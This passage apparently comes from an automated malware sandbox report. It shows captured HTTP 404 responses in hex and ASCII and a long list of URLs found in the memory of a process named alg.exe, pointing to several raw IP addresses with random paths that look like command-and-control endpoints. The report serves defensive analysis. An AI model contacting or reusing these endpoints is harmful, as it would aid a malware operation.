3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:27:08 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/fkcgbfiiatbbgsse
Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/rfuetphopheyd5e
Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/xgyulldvremqd
Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/xgyulldvremqdsJiM4
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/fkcgbfiiatbbgsseZ
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/95Z4
Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/E6
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/I6
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/e6
Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/hmsaqgigfaxqle
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138/tpnpycqre
Source: alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138:80/hmsaqgigfaxqleZ
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.138:80/tpnpycqre
Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.234.222.143:80/gcfjbafgheaeckZ
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/0
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/1
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/U6
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dnuv
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2646796580.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2641170995.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/hij
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2646796580.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2641170995.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/hijttingsfia4
Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/idnuv
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/idnuvngs
Source: alg.exe, 00000010.00000003.2469063610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/jntykoegrmymca
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/luqhjxxa
Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/luqhjxxa6
Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/ngs
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/p
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/idnuvL
Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1625043610.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/luqhjxxaeight
Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2758575207.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/
Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/P
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2707611078.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2838553167.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2821712135.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2869356422.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2847946283.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2787015500.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2859107398.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2813010985.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2768042043.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2795361454.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/agwyffystye
Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2838553167.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2821712135.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2869356422.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2847946283.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2787015500.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2859107398.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2813010985.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2768042043.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2795361454.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/agwyffystyegslio4
Source: alg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/aoayitmlcu
Source: alg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.208.156.248/aoayitmlcurkm
